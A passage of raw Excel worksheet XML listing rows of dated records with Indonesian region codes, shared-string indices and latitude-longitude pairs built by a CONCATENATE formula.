      <c r="S2160" t="s">
        <v>1346</v>
      </c>
      <c r="T2160" t="s">
        <v>1221</v>
      </c>
      <c r="U2160" s="5">
        <v>11276935</v>
      </c>
      <c r="V2160" s="5" t="s">
        <v>16372</v>
      </c>
      <c r="W2160" s="5">
        <v>-732618</v>
      </c>
      <c r="X2160" t="s">
        <v>20121</v>
      </c>
      <c r="Y2160" t="str">
        <f t="shared" si="33"/>
        <v>-7.32618,112.76935</v>
      </c>
    </row>
    <row r="2161" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2161">
        <v>191332</v>
      </c>
      <c r="B2161" s="1">
        <v>43979</v>
      </c>
      <c r="C2161" s="2">
        <v>0.43333333333333335</v>
      </c>
      <c r="D2161" t="s">
        <v>2648</v>
      </c>
      <c r="E2161" t="s">
        <v>23</v>
      </c>
      <c r="G2161" t="s">
        <v>7225</v>
      </c>
      <c r="H2161" t="s">
        <v>26</v>
      </c>
      <c r="J2161" t="s">
        <v>2622</v>
      </c>
      <c r="L2161" t="s">
        <v>7226</v>
      </c>
      <c r="M2161">
        <v>3578070002</v>
      </c>
      <c r="N2161">
        <v>3578070</v>
      </c>
      <c r="O2161">
        <v>3578</v>
      </c>
      <c r="P2161">
        <v>35</v>
      </c>
      <c r="Q2161" t="s">
        <v>7212</v>
      </c>
      <c r="R2161" t="s">
        <v>7213</v>
      </c>
      <c r="S2161" t="s">
        <v>1346</v>
      </c>
      <c r="T2161" t="s">
        <v>1221</v>
      </c>
      <c r="U2161" s="5">
        <v>11280109</v>
      </c>
      <c r="V2161" s="5" t="s">
        <v>16373</v>
      </c>
      <c r="W2161" s="5">
        <v>-732535</v>
      </c>
      <c r="X2161" t="s">
        <v>20122</v>
      </c>
      <c r="Y2161" t="str">
        <f t="shared" si="33"/>
        <v>-7.32535,112.80109</v>
      </c>
    </row>
    <row r="2162" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2162">
        <v>191359</v>
      </c>
      <c r="B2162" s="1">
        <v>43979</v>
      </c>
      <c r="C2162" s="2">
        <v>0.50340277777777775</v>
      </c>
      <c r="D2162" t="s">
        <v>22</v>
      </c>
      <c r="E2162" t="s">
        <v>23</v>
      </c>
      <c r="F2162" t="s">
        <v>7227</v>
      </c>
      <c r="H2162" t="s">
        <v>26</v>
      </c>
      <c r="I2162" t="s">
        <v>1538</v>
      </c>
      <c r="J2162" t="s">
        <v>2622</v>
      </c>
      <c r="L2162" t="s">
        <v>7228</v>
      </c>
      <c r="M2162">
        <v>3578050003</v>
      </c>
      <c r="N2162">
        <v>3578050</v>
      </c>
      <c r="O2162">
        <v>3578</v>
      </c>
      <c r="P2162">
        <v>35</v>
      </c>
      <c r="Q2162" t="s">
        <v>7229</v>
      </c>
      <c r="R2162" t="s">
        <v>7229</v>
      </c>
      <c r="S2162" t="s">
        <v>1346</v>
      </c>
      <c r="T2162" t="s">
        <v>1221</v>
      </c>
      <c r="U2162" s="5">
        <v>11276240</v>
      </c>
      <c r="V2162" s="5" t="s">
        <v>16374</v>
      </c>
      <c r="W2162" s="5">
        <v>-731629</v>
      </c>
      <c r="X2162" t="s">
        <v>20123</v>
      </c>
      <c r="Y2162" t="str">
        <f t="shared" si="33"/>
        <v>-7.31629,112.76240</v>
      </c>
    </row>
    <row r="2163" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2163">
        <v>191367</v>
      </c>
      <c r="B2163" s="1">
        <v>43979</v>
      </c>
      <c r="C2163" s="2">
        <v>0.52626157407407403</v>
      </c>
      <c r="D2163" t="s">
        <v>22</v>
      </c>
      <c r="E2163" t="s">
        <v>23</v>
      </c>
      <c r="F2163" t="s">
        <v>7230</v>
      </c>
      <c r="G2163" t="s">
        <v>7231</v>
      </c>
      <c r="H2163" t="s">
        <v>26</v>
      </c>
      <c r="I2163" t="s">
        <v>137</v>
      </c>
      <c r="J2163" t="s">
        <v>2622</v>
      </c>
      <c r="L2163" t="s">
        <v>7232</v>
      </c>
      <c r="M2163">
        <v>3515140002</v>
      </c>
      <c r="N2163">
        <v>3515140</v>
      </c>
      <c r="O2163">
        <v>3515</v>
      </c>
      <c r="P2163">
        <v>35</v>
      </c>
      <c r="Q2163" t="s">
        <v>7233</v>
      </c>
      <c r="R2163" t="s">
        <v>1927</v>
      </c>
      <c r="S2163" t="s">
        <v>1928</v>
      </c>
      <c r="T2163" t="s">
        <v>1221</v>
      </c>
      <c r="U2163" s="5">
        <v>11272629</v>
      </c>
      <c r="V2163" s="5" t="s">
        <v>16375</v>
      </c>
      <c r="W2163" s="5">
        <v>-736473</v>
      </c>
      <c r="X2163" t="s">
        <v>20124</v>
      </c>
      <c r="Y2163" t="str">
        <f t="shared" si="33"/>
        <v>-7.36473,112.72629</v>
      </c>
    </row>
    <row r="2164" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2164">
        <v>191392</v>
      </c>
      <c r="B2164" s="1">
        <v>43979</v>
      </c>
      <c r="C2164" s="2">
        <v>0.60961805555555559</v>
      </c>
      <c r="D2164" t="s">
        <v>22</v>
      </c>
      <c r="E2164" t="s">
        <v>23</v>
      </c>
      <c r="F2164" t="s">
        <v>7234</v>
      </c>
      <c r="H2164" t="s">
        <v>26</v>
      </c>
      <c r="I2164" t="s">
        <v>137</v>
      </c>
      <c r="J2164" t="s">
        <v>2622</v>
      </c>
      <c r="L2164" t="s">
        <v>7235</v>
      </c>
      <c r="M2164">
        <v>3578070003</v>
      </c>
      <c r="N2164">
        <v>3578070</v>
      </c>
      <c r="O2164">
        <v>3578</v>
      </c>
      <c r="P2164">
        <v>35</v>
      </c>
      <c r="Q2164" t="s">
        <v>7221</v>
      </c>
      <c r="R2164" t="s">
        <v>7213</v>
      </c>
      <c r="S2164" t="s">
        <v>1346</v>
      </c>
      <c r="T2164" t="s">
        <v>1221</v>
      </c>
      <c r="U2164" s="5">
        <v>11279664</v>
      </c>
      <c r="V2164" s="5" t="s">
        <v>16376</v>
      </c>
      <c r="W2164" s="5">
        <v>-731495</v>
      </c>
      <c r="X2164" t="s">
        <v>20125</v>
      </c>
      <c r="Y2164" t="str">
        <f t="shared" si="33"/>
        <v>-7.31495,112.79664</v>
      </c>
    </row>
    <row r="2165" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2165">
        <v>191413</v>
      </c>
      <c r="B2165" s="1">
        <v>43979</v>
      </c>
      <c r="C2165" s="2">
        <v>0.6810532407407407</v>
      </c>
      <c r="D2165" t="s">
        <v>22</v>
      </c>
      <c r="E2165" t="s">
        <v>23</v>
      </c>
      <c r="F2165" t="s">
        <v>7236</v>
      </c>
      <c r="H2165" t="s">
        <v>26</v>
      </c>
      <c r="I2165" t="s">
        <v>137</v>
      </c>
      <c r="J2165" t="s">
        <v>2622</v>
      </c>
      <c r="L2165" t="s">
        <v>7237</v>
      </c>
      <c r="M2165">
        <v>3574020002</v>
      </c>
      <c r="N2165">
        <v>3574020</v>
      </c>
      <c r="O2165">
        <v>3574</v>
      </c>
      <c r="P2165">
        <v>35</v>
      </c>
      <c r="Q2165" t="s">
        <v>7238</v>
      </c>
      <c r="R2165" t="s">
        <v>7239</v>
      </c>
      <c r="S2165" t="s">
        <v>7240</v>
      </c>
      <c r="T2165" t="s">
        <v>1221</v>
      </c>
      <c r="U2165" s="5">
        <v>11321810</v>
      </c>
      <c r="V2165" s="5" t="s">
        <v>16377</v>
      </c>
      <c r="W2165" s="5">
        <v>-778067</v>
      </c>
      <c r="X2165" t="s">
        <v>20126</v>
      </c>
      <c r="Y2165" t="str">
        <f t="shared" si="33"/>
        <v>-7.78067,113.21810</v>
      </c>
    </row>
    <row r="2166" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2166">
        <v>191422</v>
      </c>
      <c r="B2166" s="1">
        <v>43979</v>
      </c>
      <c r="C2166" s="2">
        <v>0.70680555555555558</v>
      </c>
      <c r="D2166" t="s">
        <v>22</v>
      </c>
      <c r="E2166" t="s">
        <v>23</v>
      </c>
      <c r="F2166" t="s">
        <v>7241</v>
      </c>
      <c r="H2166" t="s">
        <v>26</v>
      </c>
      <c r="I2166" t="s">
        <v>137</v>
      </c>
      <c r="J2166" t="s">
        <v>2622</v>
      </c>
      <c r="L2166" t="s">
        <v>7242</v>
      </c>
      <c r="M2166">
        <v>3578060003</v>
      </c>
      <c r="N2166">
        <v>3578060</v>
      </c>
      <c r="O2166">
        <v>3578</v>
      </c>
      <c r="P2166">
        <v>35</v>
      </c>
      <c r="Q2166" t="s">
        <v>2631</v>
      </c>
      <c r="R2166" t="s">
        <v>2631</v>
      </c>
      <c r="S2166" t="s">
        <v>1346</v>
      </c>
      <c r="T2166" t="s">
        <v>1221</v>
      </c>
      <c r="U2166" s="5">
        <v>11278286</v>
      </c>
      <c r="V2166" s="5" t="s">
        <v>16378</v>
      </c>
      <c r="W2166" s="5">
        <v>-733963</v>
      </c>
      <c r="X2166" t="s">
        <v>20127</v>
      </c>
      <c r="Y2166" t="str">
        <f t="shared" si="33"/>
        <v>-7.33963,112.78286</v>
      </c>
    </row>
    <row r="2167" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2167">
        <v>191479</v>
      </c>
      <c r="B2167" s="1">
        <v>43979</v>
      </c>
      <c r="C2167" s="2">
        <v>0.90290509259259266</v>
      </c>
      <c r="D2167" t="s">
        <v>22</v>
      </c>
      <c r="E2167" t="s">
        <v>23</v>
      </c>
      <c r="F2167" t="s">
        <v>7243</v>
      </c>
      <c r="H2167" t="s">
        <v>26</v>
      </c>
      <c r="I2167" t="s">
        <v>1498</v>
      </c>
      <c r="J2167" t="s">
        <v>2622</v>
      </c>
      <c r="L2167" t="s">
        <v>7244</v>
      </c>
      <c r="M2167">
        <v>3578260002</v>
      </c>
      <c r="N2167">
        <v>3578260</v>
      </c>
      <c r="O2167">
        <v>3578</v>
      </c>
      <c r="P2167">
        <v>35</v>
      </c>
      <c r="Q2167" t="s">
        <v>7245</v>
      </c>
      <c r="R2167" t="s">
        <v>7246</v>
      </c>
      <c r="S2167" t="s">
        <v>1346</v>
      </c>
      <c r="T2167" t="s">
        <v>1221</v>
      </c>
      <c r="U2167" s="5">
        <v>11271501</v>
      </c>
      <c r="V2167" s="5" t="s">
        <v>16379</v>
      </c>
      <c r="W2167" s="5">
        <v>-723395</v>
      </c>
      <c r="X2167" t="s">
        <v>20128</v>
      </c>
      <c r="Y2167" t="str">
        <f t="shared" si="33"/>
        <v>-7.23395,112.71501</v>
      </c>
    </row>
    <row r="2168" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2168">
        <v>191527</v>
      </c>
      <c r="B2168" s="1">
        <v>43980</v>
      </c>
      <c r="C2168" s="2">
        <v>6.6053240740740746E-2</v>
      </c>
      <c r="D2168" t="s">
        <v>22</v>
      </c>
      <c r="E2168" t="s">
        <v>23</v>
      </c>
      <c r="F2168" t="s">
        <v>7247</v>
      </c>
      <c r="G2168" t="s">
        <v>7248</v>
      </c>
      <c r="H2168" t="s">
        <v>26</v>
      </c>
      <c r="I2168" t="s">
        <v>137</v>
      </c>
      <c r="J2168" t="s">
        <v>2622</v>
      </c>
      <c r="L2168" t="s">
        <v>7249</v>
      </c>
      <c r="M2168">
        <v>3578100003</v>
      </c>
      <c r="N2168">
        <v>3578100</v>
      </c>
      <c r="O2168">
        <v>3578</v>
      </c>
      <c r="P2168">
        <v>35</v>
      </c>
      <c r="Q2168" t="s">
        <v>1942</v>
      </c>
      <c r="R2168" t="s">
        <v>1545</v>
      </c>
      <c r="S2168" t="s">
        <v>1346</v>
      </c>
      <c r="T2168" t="s">
        <v>1221</v>
      </c>
      <c r="U2168" s="5">
        <v>11275947</v>
      </c>
      <c r="V2168" s="5" t="s">
        <v>16380</v>
      </c>
      <c r="W2168" s="5">
        <v>-728429</v>
      </c>
      <c r="X2168" t="s">
        <v>20129</v>
      </c>
      <c r="Y2168" t="str">
        <f t="shared" si="33"/>
        <v>-7.28429,112.75947</v>
      </c>
    </row>
    <row r="2169" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2169">
        <v>191749</v>
      </c>
      <c r="B2169" s="1">
        <v>43980</v>
      </c>
      <c r="C2169" s="2">
        <v>0.75159722222222225</v>
      </c>
      <c r="D2169" t="s">
        <v>22</v>
      </c>
      <c r="E2169" t="s">
        <v>23</v>
      </c>
      <c r="F2169" s="3" t="s">
        <v>7250</v>
      </c>
      <c r="H2169" t="s">
        <v>26</v>
      </c>
      <c r="I2169" t="s">
        <v>137</v>
      </c>
      <c r="J2169" t="s">
        <v>1656</v>
      </c>
      <c r="L2169" t="s">
        <v>7251</v>
      </c>
      <c r="M2169">
        <v>3173080003</v>
      </c>
      <c r="N2169">
        <v>3173080</v>
      </c>
      <c r="O2169">
        <v>3173</v>
      </c>
      <c r="P2169">
        <v>31</v>
      </c>
      <c r="Q2169" t="s">
        <v>157</v>
      </c>
      <c r="R2169" t="s">
        <v>157</v>
      </c>
      <c r="S2169" t="s">
        <v>62</v>
      </c>
      <c r="T2169" t="s">
        <v>33</v>
      </c>
      <c r="U2169" s="5">
        <v>10682715</v>
      </c>
      <c r="V2169" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2169" s="5">
        <v>-617539</v>
      </c>
      <c r="X2169" t="s">
        <v>19329</v>
      </c>
      <c r="Y2169" t="str">
        <f t="shared" si="33"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2170" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2170">
        <v>191814</v>
      </c>
      <c r="B2170" s="1">
        <v>43981</v>
      </c>
      <c r="C2170" s="2">
        <v>9.5810185185185179E-2</v>
      </c>
      <c r="D2170" t="s">
        <v>22</v>
      </c>
      <c r="E2170" t="s">
        <v>23</v>
      </c>
      <c r="F2170" t="s">
        <v>7252</v>
      </c>
      <c r="H2170" t="s">
        <v>26</v>
      </c>
      <c r="I2170" t="s">
        <v>137</v>
      </c>
      <c r="J2170" t="s">
        <v>1656</v>
      </c>
      <c r="L2170" t="s">
        <v>7253</v>
      </c>
      <c r="M2170">
        <v>3173080003</v>
      </c>
      <c r="N2170">
        <v>3173080</v>
      </c>
      <c r="O2170">
        <v>3173</v>
      </c>
      <c r="P2170">
        <v>31</v>
      </c>
      <c r="Q2170" t="s">
        <v>157</v>
      </c>
      <c r="R2170" t="s">
        <v>157</v>
      </c>
      <c r="S2170" t="s">
        <v>62</v>
      </c>
      <c r="T2170" t="s">
        <v>33</v>
      </c>
      <c r="U2170" s="5">
        <v>10682721</v>
      </c>
      <c r="V2170" s="5" t="s">
        <v>16382</v>
      </c>
      <c r="W2170" s="5">
        <v>-617535</v>
      </c>
      <c r="X2170" t="s">
        <v>18338</v>
      </c>
      <c r="Y2170" t="str">
        <f t="shared" si="33"/>
        <v>-6.17535,106.82721</v>
      </c>
    </row>
    <row r="2171" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2171">
        <v>191822</v>
      </c>
      <c r="B2171" s="1">
        <v>43981</v>
      </c>
      <c r="C2171" s="2">
        <v>0.28410879629629632</v>
      </c>
      <c r="D2171" t="s">
        <v>22</v>
      </c>
      <c r="E2171" t="s">
        <v>23</v>
      </c>
      <c r="F2171" t="s">
        <v>7254</v>
      </c>
      <c r="G2171" t="s">
        <v>7255</v>
      </c>
      <c r="H2171" t="s">
        <v>26</v>
      </c>
      <c r="I2171" t="s">
        <v>137</v>
      </c>
      <c r="J2171" t="s">
        <v>2248</v>
      </c>
      <c r="L2171" t="s">
        <v>7256</v>
      </c>
      <c r="M2171">
        <v>3172080003</v>
      </c>
      <c r="N2171">
        <v>3172080</v>
      </c>
      <c r="O2171">
        <v>3172</v>
      </c>
      <c r="P2171">
        <v>31</v>
      </c>
      <c r="Q2171" t="s">
        <v>2250</v>
      </c>
      <c r="R2171" t="s">
        <v>141</v>
      </c>
      <c r="S2171" t="s">
        <v>49</v>
      </c>
      <c r="T2171" t="s">
        <v>33</v>
      </c>
      <c r="U2171" s="5">
        <v>10695228</v>
      </c>
      <c r="V2171" s="5" t="s">
        <v>15426</v>
      </c>
      <c r="W2171" s="5">
        <v>-620337</v>
      </c>
      <c r="X2171" t="s">
        <v>20130</v>
      </c>
      <c r="Y2171" t="str">
        <f t="shared" si="33"/>
        <v>-6.20337,106.95228</v>
      </c>
    </row>
    <row r="2172" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2172">
        <v>191824</v>
      </c>
      <c r="B2172" s="1">
        <v>43981</v>
      </c>
      <c r="C2172" s="2">
        <v>0.30429398148148151</v>
      </c>
      <c r="D2172" t="s">
        <v>22</v>
      </c>
      <c r="E2172" t="s">
        <v>23</v>
      </c>
      <c r="F2172" t="s">
        <v>7257</v>
      </c>
      <c r="G2172" t="s">
        <v>7258</v>
      </c>
      <c r="H2172" t="s">
        <v>26</v>
      </c>
      <c r="I2172" t="s">
        <v>137</v>
      </c>
      <c r="J2172" t="s">
        <v>6707</v>
      </c>
      <c r="L2172" t="s">
        <v>7259</v>
      </c>
      <c r="M2172">
        <v>5202030009</v>
      </c>
      <c r="N2172">
        <v>5202030</v>
      </c>
      <c r="O2172">
        <v>5202</v>
      </c>
      <c r="P2172">
        <v>52</v>
      </c>
      <c r="Q2172" t="s">
        <v>7260</v>
      </c>
      <c r="R2172" t="s">
        <v>7261</v>
      </c>
      <c r="S2172" t="s">
        <v>7262</v>
      </c>
      <c r="T2172" t="s">
        <v>2154</v>
      </c>
      <c r="U2172" s="5">
        <v>11636180</v>
      </c>
      <c r="V2172" s="5" t="s">
        <v>16383</v>
      </c>
      <c r="W2172" s="5">
        <v>-875481</v>
      </c>
      <c r="X2172" t="s">
        <v>20131</v>
      </c>
      <c r="Y2172" t="str">
        <f t="shared" si="33"/>
        <v>-8.75481,116.36180</v>
      </c>
    </row>
    <row r="2173" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2173">
        <v>191834</v>
      </c>
      <c r="B2173" s="1">
        <v>43981</v>
      </c>
      <c r="C2173" s="2">
        <v>0.62344907407407402</v>
      </c>
      <c r="D2173" t="s">
        <v>22</v>
      </c>
      <c r="E2173" t="s">
        <v>23</v>
      </c>
      <c r="F2173" t="s">
        <v>7263</v>
      </c>
      <c r="H2173" t="s">
        <v>26</v>
      </c>
      <c r="I2173" t="s">
        <v>166</v>
      </c>
      <c r="J2173" t="s">
        <v>6509</v>
      </c>
      <c r="L2173" t="s">
        <v>7264</v>
      </c>
      <c r="M2173">
        <v>6302121006</v>
      </c>
      <c r="N2173">
        <v>6302121</v>
      </c>
      <c r="O2173">
        <v>6302</v>
      </c>
      <c r="P2173">
        <v>63</v>
      </c>
      <c r="Q2173" t="s">
        <v>7265</v>
      </c>
      <c r="R2173" t="s">
        <v>7266</v>
      </c>
      <c r="S2173" t="s">
        <v>3526</v>
      </c>
      <c r="T2173" t="s">
        <v>6513</v>
      </c>
      <c r="U2173" s="5">
        <v>11600453</v>
      </c>
      <c r="V2173" s="5" t="s">
        <v>16384</v>
      </c>
      <c r="W2173" s="5">
        <v>-319438</v>
      </c>
      <c r="X2173" t="s">
        <v>20132</v>
      </c>
      <c r="Y2173" t="str">
        <f t="shared" si="33"/>
        <v>-3.19438,116.00453</v>
      </c>
    </row>
    <row r="2174" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2174">
        <v>191835</v>
      </c>
      <c r="B2174" s="1">
        <v>43981</v>
      </c>
      <c r="C2174" s="2">
        <v>0.6424305555555555</v>
      </c>
      <c r="D2174" t="s">
        <v>22</v>
      </c>
      <c r="E2174" t="s">
        <v>23</v>
      </c>
      <c r="F2174" t="s">
        <v>7267</v>
      </c>
      <c r="G2174" t="s">
        <v>7268</v>
      </c>
      <c r="H2174" t="s">
        <v>26</v>
      </c>
      <c r="I2174" t="s">
        <v>7269</v>
      </c>
      <c r="J2174" t="s">
        <v>2615</v>
      </c>
      <c r="L2174" t="s">
        <v>7270</v>
      </c>
      <c r="M2174">
        <v>3471110001</v>
      </c>
      <c r="N2174">
        <v>3471110</v>
      </c>
      <c r="O2174">
        <v>3471</v>
      </c>
      <c r="P2174">
        <v>34</v>
      </c>
      <c r="Q2174" t="s">
        <v>7271</v>
      </c>
      <c r="R2174" t="s">
        <v>7272</v>
      </c>
      <c r="S2174" t="s">
        <v>7273</v>
      </c>
      <c r="T2174" t="s">
        <v>1856</v>
      </c>
      <c r="U2174" s="5">
        <v>11034898</v>
      </c>
      <c r="V2174" s="5" t="s">
        <v>16385</v>
      </c>
      <c r="W2174" s="5">
        <v>-780979</v>
      </c>
      <c r="X2174" t="s">
        <v>20133</v>
      </c>
      <c r="Y2174" t="str">
        <f t="shared" si="33"/>
        <v>-7.80979,110.34898</v>
      </c>
    </row>
    <row r="2175" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2175">
        <v>191836</v>
      </c>
      <c r="B2175" s="1">
        <v>43982</v>
      </c>
      <c r="C2175" s="2">
        <v>0.97024305555555557</v>
      </c>
      <c r="D2175" t="s">
        <v>22</v>
      </c>
      <c r="E2175" t="s">
        <v>23</v>
      </c>
      <c r="F2175" t="s">
        <v>7274</v>
      </c>
      <c r="G2175" t="s">
        <v>7275</v>
      </c>
      <c r="H2175" t="s">
        <v>26</v>
      </c>
      <c r="I2175" t="s">
        <v>7276</v>
      </c>
      <c r="J2175" t="s">
        <v>7277</v>
      </c>
      <c r="L2175" t="s">
        <v>7278</v>
      </c>
      <c r="M2175">
        <v>5103020005</v>
      </c>
      <c r="N2175">
        <v>5103020</v>
      </c>
      <c r="O2175">
        <v>5103</v>
      </c>
      <c r="P2175">
        <v>51</v>
      </c>
      <c r="Q2175" t="s">
        <v>7279</v>
      </c>
      <c r="R2175" t="s">
        <v>7280</v>
      </c>
      <c r="S2175" t="s">
        <v>7281</v>
      </c>
      <c r="T2175" t="s">
        <v>7282</v>
      </c>
      <c r="U2175" s="5">
        <v>11517473</v>
      </c>
      <c r="V2175" s="5" t="s">
        <v>16386</v>
      </c>
      <c r="W2175" s="5">
        <v>-868542</v>
      </c>
      <c r="X2175" t="s">
        <v>20134</v>
      </c>
      <c r="Y2175" t="str">
        <f t="shared" si="33"/>
        <v>-8.68542,115.17473</v>
      </c>
    </row>
    <row r="2176" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2176">
        <v>191838</v>
      </c>
      <c r="B2176" s="1">
        <v>43983</v>
      </c>
      <c r="C2176" s="2">
        <v>0.22136574074074075</v>
      </c>
      <c r="D2176" t="s">
        <v>22</v>
      </c>
      <c r="E2176" t="s">
        <v>23</v>
      </c>
      <c r="F2176" t="s">
        <v>7283</v>
      </c>
      <c r="G2176" t="s">
        <v>7284</v>
      </c>
      <c r="H2176" t="s">
        <v>26</v>
      </c>
      <c r="I2176" t="s">
        <v>7285</v>
      </c>
      <c r="J2176" t="s">
        <v>2622</v>
      </c>
      <c r="L2176" t="s">
        <v>7286</v>
      </c>
      <c r="M2176">
        <v>3517130002</v>
      </c>
      <c r="N2176">
        <v>3517130</v>
      </c>
      <c r="O2176">
        <v>3517</v>
      </c>
      <c r="P2176">
        <v>35</v>
      </c>
      <c r="Q2176" t="s">
        <v>7287</v>
      </c>
      <c r="R2176" t="s">
        <v>340</v>
      </c>
      <c r="S2176" t="s">
        <v>340</v>
      </c>
      <c r="T2176" t="s">
        <v>1221</v>
      </c>
      <c r="U2176" s="5">
        <v>11220871</v>
      </c>
      <c r="V2176" s="5" t="s">
        <v>16387</v>
      </c>
      <c r="W2176" s="5">
        <v>-757102</v>
      </c>
      <c r="X2176" t="s">
        <v>20135</v>
      </c>
      <c r="Y2176" t="str">
        <f t="shared" si="33"/>
        <v>-7.57102,112.20871</v>
      </c>
    </row>
    <row r="2177" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2177">
        <v>191841</v>
      </c>
      <c r="B2177" s="1">
        <v>43984</v>
      </c>
      <c r="C2177" s="2">
        <v>0.37291666666666662</v>
      </c>
      <c r="D2177" t="s">
        <v>2648</v>
      </c>
      <c r="E2177" t="s">
        <v>23</v>
      </c>
      <c r="G2177" t="s">
        <v>7288</v>
      </c>
      <c r="H2177" t="s">
        <v>26</v>
      </c>
      <c r="J2177" t="s">
        <v>7289</v>
      </c>
      <c r="L2177" t="s">
        <v>7290</v>
      </c>
      <c r="M2177">
        <v>3174080003</v>
      </c>
      <c r="N2177">
        <v>3174080</v>
      </c>
      <c r="O2177">
        <v>3174</v>
      </c>
      <c r="P2177">
        <v>31</v>
      </c>
      <c r="Q2177" t="s">
        <v>1700</v>
      </c>
      <c r="R2177" t="s">
        <v>695</v>
      </c>
      <c r="S2177" t="s">
        <v>32</v>
      </c>
      <c r="T2177" t="s">
        <v>33</v>
      </c>
      <c r="U2177" s="5">
        <v>10671819</v>
      </c>
      <c r="V2177" s="5" t="s">
        <v>16388</v>
      </c>
      <c r="W2177" s="5">
        <v>-613852</v>
      </c>
      <c r="X2177" t="s">
        <v>20136</v>
      </c>
      <c r="Y2177" t="str">
        <f t="shared" si="33"/>
        <v>-6.13852,106.71819</v>
      </c>
    </row>
    <row r="2178" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2178">
        <v>191848</v>
      </c>
      <c r="B2178" s="1">
        <v>43984</v>
      </c>
      <c r="C2178" s="2">
        <v>0.51124999999999998</v>
      </c>
      <c r="D2178" t="s">
        <v>22</v>
      </c>
      <c r="E2178" t="s">
        <v>23</v>
      </c>
      <c r="F2178" t="s">
        <v>7291</v>
      </c>
      <c r="G2178" t="s">
        <v>7292</v>
      </c>
      <c r="H2178" t="s">
        <v>26</v>
      </c>
      <c r="I2178" t="s">
        <v>1624</v>
      </c>
      <c r="J2178" t="s">
        <v>2627</v>
      </c>
      <c r="L2178" t="s">
        <v>7293</v>
      </c>
      <c r="M2178">
        <v>3201250009</v>
      </c>
      <c r="N2178">
        <v>3201250</v>
      </c>
      <c r="O2178">
        <v>3201</v>
      </c>
      <c r="P2178">
        <v>32</v>
      </c>
      <c r="Q2178" t="s">
        <v>7294</v>
      </c>
      <c r="R2178" t="s">
        <v>7294</v>
      </c>
      <c r="S2178" t="s">
        <v>421</v>
      </c>
      <c r="T2178" t="s">
        <v>42</v>
      </c>
      <c r="U2178" s="5">
        <v>10668614</v>
      </c>
      <c r="V2178" s="5" t="s">
        <v>16389</v>
      </c>
      <c r="W2178" s="5">
        <v>-638712</v>
      </c>
      <c r="X2178" t="s">
        <v>20137</v>
      </c>
      <c r="Y2178" t="str">
        <f t="shared" si="33"/>
        <v>-6.38712,106.68614</v>
      </c>
    </row>
    <row r="2179" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2179">
        <v>191849</v>
      </c>
      <c r="B2179" s="1">
        <v>43985</v>
      </c>
      <c r="C2179" s="2">
        <v>0.31805555555555554</v>
      </c>
      <c r="D2179" t="s">
        <v>2648</v>
      </c>
      <c r="E2179" t="s">
        <v>23</v>
      </c>
      <c r="G2179" t="s">
        <v>7295</v>
      </c>
      <c r="H2179" t="s">
        <v>26</v>
      </c>
      <c r="J2179" t="s">
        <v>4688</v>
      </c>
      <c r="L2179" t="s">
        <v>7296</v>
      </c>
      <c r="M2179">
        <v>3171090001</v>
      </c>
      <c r="N2179">
        <v>3171090</v>
      </c>
      <c r="O2179">
        <v>3171</v>
      </c>
      <c r="P2179">
        <v>31</v>
      </c>
      <c r="Q2179" t="s">
        <v>6003</v>
      </c>
      <c r="R2179" t="s">
        <v>347</v>
      </c>
      <c r="S2179" t="s">
        <v>108</v>
      </c>
      <c r="T2179" t="s">
        <v>33</v>
      </c>
      <c r="U2179" s="5">
        <v>10683791</v>
      </c>
      <c r="V2179" s="5" t="s">
        <v>16390</v>
      </c>
      <c r="W2179" s="5">
        <v>-624139</v>
      </c>
      <c r="X2179" t="s">
        <v>20036</v>
      </c>
      <c r="Y2179" t="str">
        <f t="shared" ref="Y2179:Y2242" si="34">CONCATENATE(X2179,",",V2179)</f>
        <v>-6.24139,106.83791</v>
      </c>
    </row>
    <row r="2180" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2180">
        <v>191855</v>
      </c>
      <c r="B2180" s="1">
        <v>43985</v>
      </c>
      <c r="C2180" s="2">
        <v>0.47649305555555554</v>
      </c>
      <c r="D2180" t="s">
        <v>22</v>
      </c>
      <c r="E2180" t="s">
        <v>23</v>
      </c>
      <c r="F2180" t="s">
        <v>7297</v>
      </c>
      <c r="G2180" t="s">
        <v>7298</v>
      </c>
      <c r="H2180" t="s">
        <v>26</v>
      </c>
      <c r="I2180" t="s">
        <v>137</v>
      </c>
      <c r="J2180" t="s">
        <v>2608</v>
      </c>
      <c r="L2180" t="s">
        <v>7299</v>
      </c>
      <c r="M2180">
        <v>3329170023</v>
      </c>
      <c r="N2180">
        <v>3329170</v>
      </c>
      <c r="O2180">
        <v>3329</v>
      </c>
      <c r="P2180">
        <v>33</v>
      </c>
      <c r="Q2180" t="s">
        <v>7300</v>
      </c>
      <c r="R2180" t="s">
        <v>7301</v>
      </c>
      <c r="S2180" t="s">
        <v>7301</v>
      </c>
      <c r="T2180" t="s">
        <v>1134</v>
      </c>
      <c r="U2180" s="5">
        <v>10904479</v>
      </c>
      <c r="V2180" s="5" t="s">
        <v>16391</v>
      </c>
      <c r="W2180" s="5">
        <v>-681774</v>
      </c>
      <c r="X2180" t="s">
        <v>20138</v>
      </c>
      <c r="Y2180" t="str">
        <f t="shared" si="34"/>
        <v>-6.81774,109.04479</v>
      </c>
    </row>
    <row r="2181" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2181">
        <v>191856</v>
      </c>
      <c r="B2181" s="1">
        <v>43985</v>
      </c>
      <c r="C2181" s="2">
        <v>0.71074074074074067</v>
      </c>
      <c r="D2181" t="s">
        <v>22</v>
      </c>
      <c r="E2181" t="s">
        <v>23</v>
      </c>
      <c r="F2181" t="s">
